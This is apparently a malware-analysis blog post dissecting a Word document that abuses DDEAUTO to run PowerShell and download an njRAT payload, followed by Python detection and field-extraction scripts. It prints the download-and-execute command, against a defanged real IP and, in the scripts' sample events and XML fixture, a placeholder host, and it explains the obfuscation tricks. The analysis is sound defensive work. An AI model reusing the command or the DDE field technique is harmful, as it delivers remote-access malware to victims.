NJRAT (1.31.2020) – Malicious Document & DDEAUTO

DDEAUTO is a Word field code built on Dynamic Data Exchange (DDE), an old Windows inter-process messaging protocol. A DDE field pulls data from another application directly into the document (a live Excel range, for example), and the AUTO variant tells Word to refresh that link automatically when the document is opened. It is meant to talk to an application that is already running, but if the named application is not running, Word offers to start it.

The "application" named in the field can be any executable, including cmd.exe, so the feature doubles as a macro-less way to run commands. What could go wrong?

We will be working off of this document HERE. It downloads a payload that any.run identified as njRAT. That can be found HERE.


Document Behavior

Upon opening the document, we see this alert. Note how it says that the document contains links that may refer to other files. That wording is the tell for DDE/DDEAUTO: there is no VBA in this document, so the familiar "Enable Content" macro warning never appears, which is exactly why users trained to distrust macros still click through. If you choose Yes, Word will "update this document with the data from the linked files".

njrat01.png

Clicking Yes gives us the following alert. Nothing bad has happened yet, but if we choose Yes again it will. The dialog warns that the remote data is not accessible and asks whether we would like to start the application instead. Of course!

njrat02.png

We can now see what happens next. WINWORD.EXE spawns cmd.exe, which then spawns powershell.exe.

njrat03.png

What commands get executed here? Double-clicking cmd.exe in Process Hacker (which is where I was watching the processes spawn) shows the following command line:

C:\Programs\Collection\MSWord\..\..\..\..\windows\system32\cmd.exe /k powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('http[:]//208[.]167[.]245[.]254/signed1.exe','1.exe');start '1.exe'

Reading it is straightforward, with one twist. The path to cmd.exe is written as a made-up directory, C:\Programs\Collection\MSWord, followed by four ..\ hops, so it still resolves to C:\windows\system32\cmd.exe but looks less alarming than a bare cmd.exe in Word's "start the application" prompt. cmd.exe /k then runs powershell.exe with no profile (-NoP), non-interactive (-NonI) and the execution policy bypassed (-Exec Bypass). WebClient.DownloadFile fetches signed1.exe from the listed IP and saves it locally under the name 1.exe (a save-as, not a rename), and start launches it. The IEX wrapper adds nothing here: DownloadFile returns no value for it to evaluate, so the download and the start that follows do all the work.
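To turn the chain above into a check you can run over process-creation telemetry, here is an added example in Python (mine, not the author's or any.run's). It walks each shell's ancestry rather than only its direct parent, so the powershell.exe whose parent is cmd.exe still traces back to WINWORD.EXE, and it normalises the launcher path so the ..\ trick is reported as the cmd.exe it really is. The events are constructed to mirror the post; the pids, the Office install path, the document name and the download URL are placeholders.

```python
"""Flag shells spawned under an Office process and unmask the launcher path.

Added example for this post, not the author's tooling. The events below are
constructed to mirror the chain in the post (WINWORD.EXE -> cmd.exe ->
powershell.exe); pids, paths and the download URL are placeholders.
"""
import ntpath
import re

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://[^\s'\"(),;]+", re.I)

# Constructed process-creation events (Sysmon event 1 style, trimmed to the fields used).
SAMPLE_EVENTS = [
    {"pid": 4100, "ppid": 900,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\a\Downloads\invoice.docx"'},
    {"pid": 4212, "ppid": 4100,
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Programs\Collection\MSWord\..\..\..\..\windows\system32\cmd.exe /k powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('http://example.invalid/signed1.exe','1.exe');start '1.exe'"},
    {"pid": 4230, "ppid": 4212,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('http://example.invalid/signed1.exe','1.exe');start '1.exe'"},
    # Benign control: a cmd.exe whose parent is not an Office process.
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c dir"},
]


def base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host via ntpath)."""
    return ntpath.basename(path).lower()


def launcher(cmdline: str) -> str:
    """Resolve the executable actually named in a command line.

    Word's prompt shows the path exactly as written in the field; ntpath.normpath
    collapses the ..\\ hops so the C:\\Programs\\...\\..\\..\\windows\\system32\\cmd.exe
    form is reported as plain C:\\windows\\system32\\cmd.exe.
    """
    if cmdline.startswith('"'):                      # quoted path with spaces
        first = cmdline[1:cmdline.index('"', 1)]
    else:
        first = cmdline.split(None, 1)[0]
    return ntpath.normpath(first)


def detect(events: list) -> list:
    """Return every shell whose ancestry includes an Office process.

    Checking ancestors, not just the direct parent, is what catches the
    powershell.exe in the post: its parent is cmd.exe, its grandparent WINWORD.EXE.
    """
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        if base(e["image"]) not in SHELLS:
            continue
        chain, cur = [], by_pid.get(e["ppid"])
        while cur is not None and len(chain) < 32:   # depth cap guards against pid-reuse loops
            chain.append(base(cur["image"]))
            cur = by_pid.get(cur["ppid"])
        if OFFICE & set(chain):
            hits.append({
                "image": base(e["image"]),
                "ancestry": " <- ".join(chain),
                "launcher": launcher(e["cmdline"]),
                "urls": URL_RE.findall(e["cmdline"]),
            })
    return hits


if __name__ == "__main__":
    for h in detect(SAMPLE_EVENTS):
        print(f"{h['image']} (parents: {h['ancestry']}) launched as {h['launcher']}; urls={h['urls']}")
```

Run without arguments it reports both cmd.exe and powershell.exe from the sample and skips the control event; feeding it real Sysmon or EDR events only needs the four fields shown. The ancestry walk is deliberately bounded because pid reuse in long-lived telemetry can produce cycles.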


Where can we find it in the document?

If we turn on formatting symbols and paragraph marks in Word, we can see that the body is not completely blank. Highlighting those characters reveals that there is text in white.

njrat05.png

I will also be making the text red to make it easier to see. Right-clicking on the Russian characters, we see the option to Toggle Field Codes.

njrat06.png

Selecting that option, the field code string pops out.

njrat07.png

Notice the carriage return symbol above. If we right-click on that and also choose Toggle Field Codes, the following appears.

njrat08.png

The numbers above are decimal character codes inside a nested QUOTE field (P is 80, o is 111, and so on), and Word renders that field as the string PowerShell. The word "PowerShell" therefore never appears literally anywhere in the file; the outer DDEAUTO field assembles it at render time, which is enough to defeat a naive string search for "powershell" across the document.
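Toggling field codes by hand works for one document; for triage at scale you want the fields pulled out of the XML and the nested QUOTE resolved automatically. The following is an added example (not the author's tooling, and not a substitute for oletools' msodde, which covers far more formats): it walks a WordprocessingML part in document order, reassembles instruction text that Word splits across runs, substitutes the rendered value of any nested field into its parent, and flags DDE/DDEAUTO fields. The embedded document.xml is constructed to match the layout described above with a placeholder URL; it is not extracted from the real sample.

```python
"""Pull field codes out of a .docx and de-obfuscate nested QUOTE fields.

Added example for this post; it is not oletools' msodde and not the author's
own tooling. SAMPLE_DOCUMENT_XML is constructed to mirror the layout the post
describes: a DDEAUTO field whose 'PowerShell' token is a nested QUOTE field of
decimal character codes. The URL in it is a placeholder.
"""
import re
import sys
import zipfile
import xml.etree.ElementTree as ET

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"
DDE_RE = re.compile(r'^\s*"?DDE(AUTO)?\b', re.I)


def evaluate_field(instr: str) -> str:
    """Render a field the way Word would, as far as this script needs.

    Only QUOTE is emulated: decimal tokens become characters, quoted tokens are
    taken literally. Any other field evaluates to its own instruction text so
    nothing is lost when it sits inside another field.
    """
    m = re.match(r'\s*QUOTE\s+(.*)', instr, re.I | re.S)
    if not m:
        return instr
    return "".join(chr(int(t)) if t.isdigit() and int(t) < 0x110000 else t.strip('"')
                   for t in m.group(1).split())


def extract_fields(xml_bytes: bytes) -> list:
    """Return (instruction, rendered value) for every field in a part, in document order.

    A complex field is: fldChar begin -> instrText runs -> [fldChar separate ->
    cached result runs] -> fldChar end. The instruction may be split across many
    runs, and a field nested inside the instruction region contributes its
    *evaluated* value to the parent's code, which is how QUOTE hides 'PowerShell'.
    """
    fields, stack = [], []            # stack frame: [instruction parts, in_result_area]
    for el in ET.fromstring(xml_bytes).iter():
        if el.tag == W + "fldSimple":   # single-element field form
            instr = el.get(W + "instr", "")
            fields.append((instr.strip(), evaluate_field(instr)))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                stack.append([[], False])
            elif kind == "separate" and stack:
                stack[-1][1] = True
            elif kind == "end" and stack:
                parts, _ = stack.pop()
                instr = "".join(parts)
                value = evaluate_field(instr)
                fields.append((instr.strip(), value))
                if stack and not stack[-1][1]:   # nested inside the parent's instruction
                    stack[-1][0].append(value)
        elif el.tag == W + "instrText" and stack and not stack[-1][1]:
            stack[-1][0].append(el.text or "")
    return fields


def find_dde(xml_bytes: bytes) -> list:
    """De-obfuscated instruction text of every DDE / DDEAUTO field in the part."""
    return [instr for instr, _ in extract_fields(xml_bytes) if DDE_RE.match(instr)]


def scan_docx(path: str) -> dict:
    """Scan every XML part under word/ (body, headers, footers, footnotes, ...):
    a DDE field in a header fires exactly like one in the body."""
    hits = {}
    with zipfile.ZipFile(path) as z:
        for name in z.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                found = find_dde(z.read(name))
                if found:
                    hits[name] = found
    return hits


# Constructed sample part: the DDEAUTO field with a nested QUOTE field (not the real document).
SAMPLE_DOCUMENT_XML = r"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body><w:p>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> DDEAUTO c:\Programs\Collection\MSWord\..\..\..\..\windows\system32\cmd.exe "/k </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> QUOTE 80 111 119 101 114 83 104 101 108 108 </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r>
<w:r><w:t>PowerShell</w:t></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
<w:r><w:instrText xml:space="preserve"> -NoP -NonI -Exec Bypass IEX (New-Object System.Net.WebClient).DownloadFile('http://example.invalid/signed1.exe','1.exe');start '1.exe'" </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="separate"/></w:r>
<w:r><w:t>Error! Not a valid link.</w:t></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p></w:body></w:document>"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for part, cmds in scan_docx(sys.argv[1]).items():
            for cmd in cmds:
                print(f"{part}: {cmd}")
    else:
        for cmd in find_dde(SAMPLE_DOCUMENT_XML.encode()):
            print(cmd)
```

Run with a .docx path it reports each part that carries a DDE field; with no arguments it prints the reassembled command from the embedded sample, with "PowerShell" already in place of the QUOTE field. The script covers only the OOXML container; the legacy binary .doc format stores fields differently and needs an OLE-aware parser such as msodde.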

As for creating your own document like this (for testing purposes, of course), there are many blogs and videos that show how it is done. This one seemed rather promising: https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/

Thanks for reading!
